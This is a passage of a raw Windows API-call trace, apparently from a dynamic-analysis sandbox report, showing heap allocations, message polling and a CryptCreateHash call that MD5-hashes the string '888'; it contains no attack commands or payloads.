wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0254.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0254.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0254.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0254.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.672] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.672] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0254.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0254.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.673] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0254.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.675] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0254.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0254.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.675] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0254.675] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0254.675] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0254.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0254.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0254.676] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0254.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0254.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.676] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0254.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0254.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.676] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0254.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0254.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e517a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0254.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.677] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0254.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0254.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0254.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0254.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0254.678] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0254.678] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0254.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0254.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0254.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0254.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0254.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0254.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0254.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0254.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0254.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0254.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0254.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ec8 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0254.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0254.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0254.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0254.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0254.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0254.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0254.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.685] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0254.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0254.686] 